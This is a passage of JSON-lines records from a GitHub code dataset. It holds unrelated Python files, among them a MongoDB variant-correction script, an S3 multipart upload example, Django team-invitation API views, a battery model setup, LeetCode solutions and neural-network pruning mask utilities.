SHA1 digest from the seq, study, contig, start, ref, and alt attributes of the variant\"\"\"\n h = hashlib.sha1()\n keys = ['seq', 'study', 'contig', 'start', 'ref', 'alt']\n h.update('_'.join([str(variant_rec[key]) for key in keys]).encode())\n return h.hexdigest().upper()\n\n\ndef correct(private_config_xml_file, profile='production', mongo_database='eva_accession_sharded'):\n with pymongo.MongoClient(get_mongo_uri_for_eva_profile(profile, private_config_xml_file)) as mongo_handle:\n sve_collection = mongo_handle[mongo_database][\"submittedVariantEntity\"]\n filter_criteria = {'seq': 'GCA_002742125.1', 'study': 'PRJEB42582'}\n cursor = sve_collection.find(filter_criteria)\n insert_statements = []\n drop_statements = []\n number_of_variants_to_replace = 10\n total_inserted, total_dropped = 0, 0\n try:\n for variant in cursor:\n original_id = get_SHA1(variant)\n assert variant['_id'] == original_id, \"Original id is different from the one calculated %s != %s\" % (\n variant['_id'], original_id)\n variant['contig'] = 'CM008482.1'\n variant['_id'] = get_SHA1(variant)\n insert_statements.append(pymongo.InsertOne(variant))\n drop_statements.append(pymongo.DeleteOne({'_id': original_id}))\n result_insert = sve_collection.bulk_write(requests=insert_statements, ordered=False)\n total_inserted += result_insert.inserted_count\n result_drop = sve_collection.bulk_write(requests=drop_statements, ordered=False)\n total_dropped += result_drop.deleted_count\n logging.info('%s / %s new documents inserted' % (total_inserted, number_of_variants_to_replace))\n logging.info('%s / %s old documents dropped' % (total_dropped, number_of_variants_to_replace))\n except Exception as e:\n print(traceback.format_exc())\n raise e\n finally:\n cursor.close()\n return total_inserted\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Get stats from variant warehouse', add_help=False)\n parser.add_argument(\"--private-config-xml-file\", help=\"ex: /path/to/eva-maven-settings.xml\", required=True)\n args = parser.parse_args()\n correct(args.private_config_xml_file)\n","repo_name":"EBIvariation/eva-tasks","sub_path":"tasks/eva_2287/correct_contig_with_chr_removed.py","file_name":"correct_contig_with_chr_removed.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73828264835","text":"# Alexander Holmes\n# 9/9/22\n# CRN: 10235\n# CIS 226: Advanced Python Programming\n# TOTAL TIME TO COMPLETE: --- 5 hours ---\n\n'''\nThis program allows the user to use the mygrep utility tool. This tool\nallows us to take in two parameters - the file name, and the string that you\nare searching for. The program also prints out only the lines that match in\na given text file.\n\nHow to use\n----------------\nAfter downloading program and having python installed, run the command\nmygrep.py \"String you want to search for\" \"File you want to search in\"\n'''\nimport sys\n\ndef text_in_file(search_text, filename):\n ''' Searches for a given text inside of given filename'''\n # Try to open file, if not found, return error message.\n try:\n target_file = open(filename, \"r\")\n except OSError:\n print(\"File could not be opened/read:\", filename)\n sys.exit()\n\n for line in target_file: # for each line in the file\n if search_text in line: # search for our search text\n print(line.strip(\"\\n\"))\n \n target_file.close()\n\n\ndef main():\n # DONE: Check len(sys.argv) and warn if missing arguments\n \n # The reason why the check below is to 3, is because sys.argv[0] would\n # be the script name, the sys.argv[1] and sys.argv[2] \n # arguments are our search_text and filename respectively\n \n\n if len(sys.argv) < 3 or len(sys.argv) > 3:\n sys.stdout.write(\"Please input only the search inquiry and filename \\n\")\n return\n\n search_text = sys.argv[1]\n filename = sys.argv[2]\n\n text_in_file(search_text,filename)\n \n\nif __name__ == '__main__':\n main()\n","repo_name":"ahalex73/cis-226","sub_path":"week-2-Assignment/mygrep.py","file_name":"mygrep.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74564234753","text":"#!/usr/bin/env python\nimport math, os\nimport boto\nimport boto.s3.connection\nfrom filechunkio import FileChunkIO\n\nCONS_AK = 'ACCESS_KEY'\nCONS_SK = 'SECRET_KEY'\n\n# Connect to S3\nc = boto.connect_s3(\n aws_access_key_id=CONS_AK,\n aws_secret_access_key=CONS_SK,\n host='HOST',\n port=7480,\n is_secure=False,\n calling_format=boto.s3.connection.OrdinaryCallingFormat()\n )\n\n# b = c.get_bucket('mybucket')\nb = c.create_bucket('test-bucket')\n\n# Local file path\nsource_path = './local-large-file'\nsource_size = os.stat(source_path).st_size\n\n# Create a multipart upload request\nmul_key = 'my-multi-obj'\nheader = {\n 'x-amz-meta-joseph': 'Multipart test'\n}\nmp = b.initiate_multipart_upload(mul_key, headers=header)\n\n# Use a chunk size of 20 MiB (feel free to change this)\nchunk_size = 20971520\nchunk_count = int(math.ceil(source_size / float(chunk_size)))\n\n# Send the file parts, using FileChunkIO to create a file-like object\n# that points to a certain byte range within the original file. We\n# set bytes to never exceed the original file size.\nfor i in range(chunk_count):\n offset = chunk_size * i\n bytes = min(chunk_size, source_size - offset)\n with FileChunkIO(source_path, 'r', offset=offset,\n bytes=bytes) as fp:\n mp.upload_part_from_file(fp, part_num=i + 1)\n\n# Finish the upload\nmp.complete_upload()\n","repo_name":"atheism/toolkit","sub_path":"s3-usage/python-example/multipart.py","file_name":"multipart.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"44547084915","text":"import os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL']='2'\r\nfrom mylib import *\r\n\r\ndef main():\r\n getPicture()\r\n images = ['D:/Coding/python/FR/images/newDetection.jpg']\r\n newAligned = facenet2.align_face(images)\r\n newEmbeddings = facenet2.embedding(newAligned)\r\n length,aadharNos,aligned,embeddings = getAllImages()\r\n length += 1\r\n aligned = np.append(aligned,newAligned)\r\n embeddings = np.append(embeddings,newEmbeddings)\r\n aligned = aligned.reshape((length,160,160,3))\r\n embeddings = embeddings.reshape((length,512))\r\n comparisions = facenet2.compare(aligned,embeddings)\r\n # print(aadharNos)\r\n # print(comparisions)\r\n match = ''\r\n flag = True\r\n for i in range(len(comparisions)-1):\r\n if comparisions[i]==1:\r\n match = aadharNos[i]\r\n print('Matched to '+aadharNos[i])\r\n flag = False\r\n break\r\n if flag:\r\n print('No such Face Exist')\r\n else:\r\n getAllInfo(match)\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"agrawaljay38/ID_Verification","sub_path":"verification.py","file_name":"verification.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72849508354","text":"import asyncio\nimport os\nfrom datetime import datetime\n\nfrom aiofiles.threadpool import wrap\n\nfrom .base import BaseCollector\n\n\nRAW_DATA_PATH = os.getenv('RAW_DATA_PATH', 'raw_data')\n\n\nclass RawDataCollector(BaseCollector):\n\n output_file = None\n enabled = os.getenv('SAVE_RAW_DATA') == '1'\n\n def __init__(self, consumer):\n super().__init__(consumer)\n if self.enabled:\n self.path = os.path.join(RAW_DATA_PATH, consumer.consumer_id)\n os.mkdir(self.path)\n self._reset_output()\n\n def _reset_output(self):\n previous_output_file = self.output_file\n output_path = os.path.join(self.path, datetime.utcnow().isoformat())\n\n # using synchronous open to avoid race condition\n self.output_file = wrap(open(output_path, mode='bw'), loop=self.loop)\n\n if previous_output_file:\n self.loop.create_task(self._close_output(previous_output_file))\n\n async def _close_output(self, previous_output_file):\n pending_tasks = [task for task in asyncio.all_tasks(self.loop)\n if task._coro.cr_code.co_name == 'save_raw_data']\n if pending_tasks:\n await asyncio.wait(pending_tasks)\n await previous_output_file.close()\n\n async def save_raw_data(self, data):\n await self.output_file.write(data)\n\n def collect_data(self, data):\n self.loop.create_task(self.save_raw_data(data))\n\n def flush(self):\n self._reset_output()\n\n def stop(self):\n self.loop.run_until_complete(self._close_output(self.output_file))\n","repo_name":"Jamim/highload-demo","sub_path":"consumer/collectors/raw_data_collector.py","file_name":"raw_data_collector.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23587465711","text":"T = int(input())\r\nfor t in range(T):\r\n nc, nj = map(int, input().split())\r\n dc = [list(map(int, input().split())) for n in range(nc)]\r\n dj = [list(map(int, input().split())) for n in range(nj)]\r\n for v in dc: v.append(0)\r\n for v in dj: v.append(1)\r\n data = sorted(dc+dj)\r\n data.append(data[0][:])\r\n data[-1][0] += 1440\r\n data[-1][1] += 1440\r\n gaps = {(0,0): [], (0,1): 0, (1,0): 0, (1,1): []}\r\n total = {0:0, 1:0}\r\n res = 0\r\n for t1, t2 in zip(data, data[1:]):\r\n x = t1[2]\r\n y = t2[2]\r\n total[x] += t2[0] - t1[0]\r\n if x == y:\r\n gaps[(x,x)].append(t2[0] - t1[1]) \r\n else:\r\n gaps[(x,y)] += t2[0] - t1[1]\r\n res += 1\r\n \r\n #print(data) \r\n #print(total) \r\n #print(gaps) \r\n if total[0] > total[1]:\r\n delta = (total[0] - total[1]) // 2\r\n if delta > gaps[(0,1)]:\r\n delta -= gaps[(0,1)]\r\n for v in sorted(gaps[(0,0)], reverse = True):\r\n res += 2\r\n delta -= v\r\n if delta <= 0: break\r\n else: \r\n delta = (total[1] - total[0]) // 2\r\n if delta > gaps[(1,0)]:\r\n delta -= gaps[(1,0)]\r\n for v in sorted(gaps[(1,1)], reverse = True):\r\n res += 2\r\n delta -= v\r\n if delta <= 0: break\r\n print(\"Case #\"+str(t+1)+\":\", res)\r\n ","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_210/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":1243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13544789059","text":"from django.shortcuts import get_object_or_404\nfrom django.db.models import Count\nfrom rest_framework.generics import GenericAPIView\nfrom rest_framework.parsers import MultiPartParser, FormParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\n\nfrom account.paginations import CustomPagination\nfrom .paginations import TeamPagination\nfrom .serializers import TeamSerializer, TeamInfoSerializer, UserReceivedInvitationSerializer, \\\n TeamPendingInvitationSerializer, TeamToUserInvitationSerializer, UserToTeamInvitationSerializer\nfrom .models import Team, Invitation, InvitationStatusTypes, InvitationTypes\nfrom .permissions import HasTeam, NoTeam\nfrom account.permissions import ProfileComplete\nfrom constants import TEAM_MAX_MEMBERS\n\n\nclass TeamAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamSerializer\n queryset = Team.humans.all()\n\n def get(self, request):\n team = request.user.team\n data = self.get_serializer(team).data\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n team = self.get_serializer(data=request.data)\n team.is_valid(raise_exception=True)\n team.save()\n\n return Response(\n data=team.data,\n status=status.HTTP_201_CREATED\n )\n\n def put(self, request):\n team = self.get_serializer(\n data=request.data,\n instance=request.user.team, partial=True\n )\n team.is_valid(raise_exception=True)\n team.save()\n\n return Response(\n data=team.data,\n status=status.HTTP_201_CREATED\n )\n\n def delete(self, request):\n current_user = request.user\n\n if current_user.team.members.count() == 1:\n current_user.team.delete()\n current_user.team = None\n current_user.save()\n\n return Response(\n status=status.HTTP_204_NO_CONTENT\n )\n\n def get_permissions(self):\n new_permissions = self.permission_classes.copy()\n if self.request.method in ['PUT', 'GET', 'DELETE']:\n new_permissions += [HasTeam]\n if self.request.method == 'POST':\n new_permissions += [NoTeam, ProfileComplete]\n return [permission() for permission in new_permissions]\n\n\nclass TeamSearchAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamSerializer\n queryset = Team.humans.all()\n pagination_class = CustomPagination\n\n def get(self, request):\n term = request.GET.get('search')\n if term is None or term == '':\n return Response(\n data={\"message\": \"Provide search parameter\"},\n status=status.HTTP_400_BAD_REQUEST\n )\n teams = self.get_queryset().filter(name__icontains=term)\n page = self.paginate_queryset(teams)\n results = self.get_serializer(page, many=True).data\n\n return self.get_paginated_response(\n data=results\n )\n\n\nclass TeamInfoAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated]\n serializer_class = TeamInfoSerializer\n queryset = Team.humans.all()\n\n def get(self, request, team_id):\n team = get_object_or_404(Team, id=team_id)\n data = self.get_serializer(instance=team).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass IncompleteTeamInfoListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamInfoSerializer\n pagination_class = CustomPagination\n\n def get(self, request):\n incomplete_teams = self.get_queryset()\n page = self.paginate_queryset(incomplete_teams)\n data = self.get_serializer(instance=page, many=True).data\n\n return self.get_paginated_response(\n data=data\n )\n\n def get_queryset(self):\n queryset = Team.humans.annotate(\n members_count=Count('members')\n ).exclude(\n members_count=TEAM_MAX_MEMBERS\n )\n\n name = self.request.query_params.get('name', '')\n if name:\n queryset = queryset.filter(name__icontains=name)\n\n return queryset\n\n\nclass UserReceivedPendingInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n status=InvitationStatusTypes.PENDING,\n type=InvitationTypes.TEAM_TO_USER\n )\n data = self.get_serializer(instance=invitations, many=True).data\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass UserReceivedResolvedInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n type=InvitationTypes.TEAM_TO_USER\n ).exclude(status=InvitationStatusTypes.PENDING)\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass TeamPendingInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam]\n serializer_class = TeamPendingInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n team=request.user.team,\n status=InvitationStatusTypes.PENDING,\n type=InvitationTypes.USER_TO_TEAM\n )\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data=data,\n status=status.HTTP_200_OK\n )\n\n\nclass UserAnswerInvitationAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, NoTeam]\n serializer_class = UserReceivedInvitationSerializer\n queryset = Invitation.objects.all()\n\n def put(self, request, invitation_id):\n invitation = get_object_or_404(Invitation, id=invitation_id)\n serializer = self.get_serializer(\n instance=invitation,\n data=request.data\n )\n serializer.context['invitation_id'] = invitation_id\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n if request.query_params.get('answer') == 'yes':\n user = invitation.user\n user.team = invitation.team\n invitation.save()\n user.save()\n if invitation.team.is_complete():\n invitation.team.reject_all_pending_invitations()\n user.reject_all_pending_invites()\n\n return Response(\n data={\"detail\": f\"Invitation is {serializer.data['status']}\"},\n status=status.HTTP_201_CREATED\n )\n\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # context['invitation_id'] = self.kwargs['invitation_id']\n # return context\n\n\nclass TeamAnswerInvitationAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam]\n serializer_class = TeamPendingInvitationSerializer\n queryset = Invitation.objects.all()\n\n def put(self, request, invitation_id):\n invitation = get_object_or_404(Invitation, id=invitation_id)\n serializer = self.get_serializer(instance=invitation, data=request.data)\n serializer.context['invitation_id'] = invitation_id\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n if request.query_params.get('answer') == 'yes':\n user = invitation.user\n user.team = invitation.team\n user.save()\n if invitation.team.is_complete():\n invitation.team.reject_all_pending_invitations()\n user.reject_all_pending_invites()\n\n return Response(\n data={\"detail\": f\"Invitation is {serializer.data['status']}\"},\n status=status.HTTP_201_CREATED\n )\n\n # def get_serializer_context(self):\n # context = super().get_serializer_context()\n # context['invitation_id'] = self.kwargs['invitation_id']\n # return context\n\n\nclass TeamSentInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, HasTeam, ]\n serializer_class = TeamToUserInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n team=request.user.team,\n type=InvitationTypes.TEAM_TO_USER\n )\n data = self.get_serializer(instance=invitations, many=True).data\n\n return Response(\n data={'data': data},\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n return Response(\n data={\"message\": \"your invitation sent\"},\n status=status.HTTP_201_CREATED\n )\n\n\nclass UserSentInvitationListAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, NoTeam]\n serializer_class = UserToTeamInvitationSerializer\n queryset = Invitation.objects.all()\n\n def get(self, request):\n invitations = self.get_queryset().filter(\n user=request.user,\n type=InvitationTypes.USER_TO_TEAM\n ).reverse()\n data = self.get_serializer(instance=invitations, many=True).data\n return Response(\n data={'data': data},\n status=status.HTTP_200_OK\n )\n\n def post(self, request):\n serializer = self.get_serializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(\n data={\"message\": \"your invitation sent\"},\n status=status.HTTP_201_CREATED\n )\n\n\nclass AllTeamsAPIView(GenericAPIView):\n permission_classes = [IsAuthenticated, ]\n serializer_class = TeamInfoSerializer\n pagination_class = TeamPagination\n queryset = Team.humans.all()\n parser_classes = (MultiPartParser, FormParser)\n\n def get(self, request):\n page = self.paginate_queryset(self.get_queryset(request))\n data = self.get_serializer(instance=page, many=True).data\n return self.get_paginated_response(\n data={'data': data}\n )\n\n def get_queryset(self, request):\n name = self.request.query_params.get('name')\n\n queryset = Team.humans.filter(is_finalist=True)\n\n teams_with_final_sublission_ids = [team.id for team in\n filter(lambda\n team: team.has_final_submission(),\n queryset\n )\n ]\n try:\n teams_with_final_sublission_ids.remove(request.user.team.id)\n except ValueError:\n pass\n queryset = queryset.filter(\n id__in=teams_with_final_sublission_ids)\n\n if name:\n queryset = queryset.filter(name__icontains=name)\n\n return queryset\n","repo_name":"SharifAIChallenge/AIC22-Backend","sub_path":"team/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11581,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11961083965","text":"from fastapi import status, HTTPException\nfrom fastapi.responses import JSONResponse\nfrom sqlalchemy.orm import sessionmaker\nfrom db.connection import engine\nfrom db.models import Account_book\nfrom datetime import datetime\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n\ndef edit_account_book(no, user_id, amount, date, memo):\n try:\n search = session.query(Account_book).filter_by(no=no, user_id=user_id, status=True).first()\n if not search:\n raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail=\"데이터를 찾을 수 없습니다.\")\n\n session.query(Account_book).filter_by(no=no, user_id=user_id, status=True). \\\n update({\"amount\": amount, \"date\": date, \"memo\": memo, \"create_time\": datetime.now()})\n session.commit()\n\n return JSONResponse(status_code=status.HTTP_200_OK, content={\"message\": \"데이터 수정 완료.\"})\n\n except HTTPException as err:\n raise err\n\n except Exception as err:\n raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST, detail=str(err))\n\n finally:\n session.close()\n","repo_name":"kimhyongkui/account_book","sub_path":"db/update/account_book.py","file_name":"account_book.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2437141587","text":"QUOTE = \"'\"\n\n\ndef split_quoted(s):\n \"\"\"Split a string with quotes, some possibly escaped, into a list of\n alternating quoted and unquoted segments. Raises a ValueError if there are\n unmatched quotes.\n\n Both the first and last entry are unquoted, but might be empty, and\n therefore the length of the resulting list must be an odd number.\n \"\"\"\n result = []\n for part in s.split(QUOTE):\n if result and result[-1].endswith('\\\\'):\n result[-1] = result[-1] + QUOTE + part\n else:\n result.append(part)\n\n if not len(result) % 2:\n raise ValueError('Unmatched quote.')\n\n return result\n\n\ndef process_unquoted(s, sub):\n \"\"\"Splits a string into unquoted and quoted segments, applies a substitution\n function to the unquoted segments only, and joins it back together again.\n \"\"\"\n def gen():\n *parts, last = split_quoted(s)\n for unquoted, quoted in zip(*([iter(parts)] * 2)):\n yield sub(unquoted)\n yield QUOTE + quoted + QUOTE\n yield sub(last)\n\n return ''.join(gen())\n","repo_name":"timedata-org/expressy","sub_path":"expressy/quotes.py","file_name":"quotes.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12393797235","text":"from battery_spm_inputs import *\r\nimport numpy as np\r\n\r\n# Calculate double layer initial conditions:\r\nphi_dl_an_0 = phi_an_0 - phi_sep_0\r\nphi_dl_ca_0 = phi_ca_0 - phi_sep_0\r\n\r\n# Calculate the total storage capacity of each electrode, per unit area\r\n# (specific capacity times electrode active material mass)\r\ncapacity_anode = capacity_graphite*H_an*eps_graphite*density_graphite\r\ncapacity_cathode = capacity_LCO*H_ca*eps_LCO*density_LCO\r\n# Actual battery capacity is the minimum of these two\r\ncapacity_area = min(capacity_anode,capacity_cathode)\r\n\r\n# Integration time is 3600 seconds per hour, divide by charges per hour.\r\n# We multiply this by a \"charge fraction,\" as we do not want to charge or \r\n# discharge the battery all the way (dPhi_eq would go to plus/minus infinity!)\r\nt_final = charge_frac*3600./C_rate\r\n\r\n# Initial solution vector:\r\nSV_0 = np.array([phi_dl_an_0, T_amb, T_amb, phi_dl_ca_0, T_amb])\r\n\r\n# Create class to point to the correct variable locations in the SV:\r\nclass ptr:\r\n phi_an = 0\r\n T_an = 1\r\n\r\n T_elyte = 2\r\n\r\n phi_ca = 3\r\n T_ca = 4\r\n\r\n# Load inputs and other parameters into 'pars' class:\r\n\r\n#Preparatory calculations that we don't want stored in 'pars':\r\n# Volume- and mass-weighted average density and Cp, respectively:\r\nrho_avg_an = eps_graphite*density_graphite + (1-eps_graphite)*density_elyte\r\nmassfrac_graphite = eps_graphite*density_graphite/rho_avg_an\r\nCp_avg_an = massfrac_graphite*Cp_graphite + (1 - massfrac_graphite)*Cp_elyte\r\n\r\nrho_avg_ca = eps_LCO*density_LCO + (1-eps_LCO)*density_elyte\r\nmassfrac_LCO = eps_LCO*density_LCO/rho_avg_ca\r\nCp_avg_ca = massfrac_LCO*Cp_LCO + (1 - eps_LCO)*Cp_elyte\r\nclass pars:\r\n # Component thicknesses:\r\n H_an = H_an\r\n H_elyte = H_elyte\r\n H_ca = H_ca\r\n\r\n # Equilibrium double layer potentials (V)\r\n # Assume fixed (for now!)\r\n dPhi_eq_an = dPhi_eq_an\r\n dPhi_eq_ca = dPhi_eq_ca\r\n\r\n # Butler-Volmer parameters:\r\n i_o_an = i_o_an\r\n n_an = n_an\r\n beta_an = beta_an\r\n\r\n i_o_ca = i_o_ca\r\n n_ca = n_ca\r\n beta_ca = beta_ca\r\n \r\n # Double layer capacitances (F/m2)\r\n C_dl_an_inv = 1/C_dl_an\r\n C_dl_ca_inv = 1/C_dl_ca\r\n\r\n # Lithium enthalpies (J/mol)\r\n h_Li_an = h_Li_an\r\n h_Li_elyte = h_Li_elyte\r\n h_Li_ca = h_Li_ca\r\n\r\n # External current density:\r\n C_rate = C_rate\r\n i_ext = C_rate*capacity_area\r\n\r\n # Total geometric area per unit surface area:\r\n A_fac_an = r_p_an/3/H_an/eps_graphite\r\n A_fac_ca = r_p_ca/3/H_ca/eps_LCO\r\n\r\n # Inverse of mass density times specific heat capacity:\r\n RhoCpInv_an = 1/rho_avg_an/Cp_avg_an\r\n RhoCpInv_elyte = 1/density_elyte/Cp_elyte\r\n RhoCpInv_ca = 1/rho_avg_ca/Cp_avg_ca\r\n \r\n # Volume-averaged thermal conductivities:\r\n lambda_cond_an = (eps_graphite*lambda_cond_an \r\n + (1-eps_graphite)*lambda_cond_elyte)\r\n lambda_cond_elyte = lambda_cond_elyte\r\n lambda_cond_ca = (eps_LCO*lambda_cond_ca \r\n + (1-eps_LCO)*lambda_cond_elyte)\r\n\r\n # Electronic and ionic resistivities (ohm-m):\r\n R_el_an = 1/sigma_el_graphite/eps_graphite\r\n R_io_an = 1/sigma_io_elyte/(1-eps_graphite)\r\n R_io_elyte = 1/sigma_io_elyte/eps_elyte_sep\r\n R_io_ca = 1/sigma_io_elyte/(1-eps_LCO)\r\n R_el_ca = 1/sigma_el_LCO/eps_LCO\r\n\r\n # Emmissivity:\r\n emmissivity = emmissivity\r\n # Ambient temperature:\r\n T_amb = T_amb\r\n # Convection coefficient:\r\n h_conv = h_conv\r\n # Battery external surface area per unit volume:\r\n A_ext = A_ext\r\n\r\n#","repo_name":"liamwitteman/homework-6","sub_path":"battery_spm_init.py","file_name":"battery_spm_init.py","file_ext":"py","file_size_in_byte":3475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12658859207","text":"# Problem: https://leetcode.com/problems/shortest-path-in-binary-matrix/description/\nclass Solution:\n def isBound(self, x, y, n):\n return x >= 0 and x <= n - 1 and y >= 0 and y <= n - 1\n def shortestPathBinaryMatrix(self, grid: List[List[int]]) -> int:\n n = len(grid)\n if grid[0][0] == 1 or grid[n - 1][n - 1] == 1:\n return -1\n \n dirs = [(1, 0), (1, -1), (0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1)] # 8 - directions\n queue = []\n queue.append((0, 0))\n grid[0][0] = 1\n while len(queue) > 0:\n _x, _y = queue.pop(0)\n if _x == n - 1 and _y == n - 1:\n return grid[_x][_y]\n for _newx, _newy in dirs: # move to each directions\n _newposx = _x + _newx\n _newposy = _y + _newy\n if self.isBound(_newposx, _newposy, n) and grid[_newposx][_newposy] == 0:\n queue.append((_newposx, _newposy)) # append suitable position to queue\n grid[_newposx][_newposy] = grid[_x][_y] + 1\n return -1\n","repo_name":"thanhdxuan/Leetcode-DailyChallenge","sub_path":"June2023/01_shortestPathBinaryMatrix.py","file_name":"01_shortestPathBinaryMatrix.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17666686944","text":"\"\"\"\n{\n \"difficulty\": \"medium\",\n \"link\": \"https://leetcode.com/problems/combination-sum-ii/description/\",\n \"category\": [\"DFS\"],\n \"tags\": [\"backtracking\"],\n \"questions\": []\n}\n\"\"\"\n\n\"\"\"\n思路:\n\t- 因为是组合,不能重复,所以需要对candidates排序\n\t- 每次递归遇到相同元素需要略过,即同一元素只能递归一次\n\t- 递归时只要被选择元素后面的元素\n\"\"\"\n\ndef DFS(candidates, target, currSelection, lst):\n if target == 0:\n lst.append(currSelection)\n return\n \n for idx,candidate in enumerate(candidates):\n if candidate > target:\n break\n if idx > 0 and candidate == lastCandidate:\n continue\n lastCandidate = candidate\n DFS(candidates[idx+1:], target-candidate, currSelection+[candidate], lst)\n\nclass Solution:\n def combinationSum2(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n candidates.sort()\n lst = []\n DFS(candidates, target, [], lst)\n return lst","repo_name":"DanqiChang/leetcode-notes","sub_path":"solutions/40.py","file_name":"40.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35782047971","text":"import torch\nimport torchvision\nimport torchvision.transforms as transforms\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch import Tensor\nfrom typing import Dict, Iterable, Callable\nfrom collections import OrderedDict\nfrom circuit_explorer.utils import TargetReached, params_2_target_from_scores\nimport types\nfrom copy import deepcopy\n\n\n#### MASKS #####\n'''\nFunctions for masking the network, given scores\n'''\n\ndef mask_from_scores(scores, sparsity=None,num_params_to_keep=None,model = None,unit=None,target_layer=None,relevant_sparsity=True,flip_mask=False):\n\t'''\n\trelevant sparsity: the sparsity given is with respect to 'relevant' parameters\n\t'''\n\tassert not ((sparsity is None) and (num_params_to_keep is None))\n\n\tkeep_masks = OrderedDict()\n\t\n\t#flatten\n\tscores_flat = torch.cat([torch.flatten(x) for x in scores.values()])\n\tnorm_factor = torch.sum(abs(scores_flat))\n\tscores_flat.div_(norm_factor)\n\n\t#num kept params\n\tif not num_params_to_keep is None:\n\t\tk = num_params_to_keep\n\telif relevant_sparsity:\n\t\tassert not (model is None or unit is None or target_layer is None)\n\t\ttotal_params = params_2_target_from_scores(scores,unit,target_layer,model)\n\t\tk = int(total_params * sparsity)\n\telse:\n\t\ttotal_params = len(scores_flat)\n\t\tk = int(total_params * sparsity)\n\n\t#get threshold score\n\tthreshold, _ = torch.topk(scores_flat, k, sorted=True)\n\tacceptable_score = threshold[-1]\n\n\n\t\n\tif acceptable_score == 0:\n\t\tprint('gradients from this feature are sparse, the minimum acceptable score at this sparsity has a score of zero! we will return a mask thats smaller than you asked, by masking all parameters with a score of zero.')\n\n\tfor layer_name in scores:\n\t\tlayer_scores = scores[layer_name]\n\t\tif flip_mask:\n\t\t\tkeep_masks[layer_name] = 1 - (layer_scores / norm_factor > acceptable_score).float()\n\t\telse:\n\t\t\tkeep_masks[layer_name] = (layer_scores / norm_factor > acceptable_score).float()\n\t\n\n\n\treturn keep_masks\n\n\ndef masked_conv2d_forward(self, x):\n\n\t#pass input through conv and weight mask\n\n\tx = F.conv2d(x, self.weight * self.weight_mask, self.bias,\n\t\t\t\t\tself.stride, self.padding, self.dilation, self.groups) \n\n\treturn x\n\ndef masked_linear_forward(self, x):\n\n\tx = F.linear(x, self.weight * self.weight_mask, 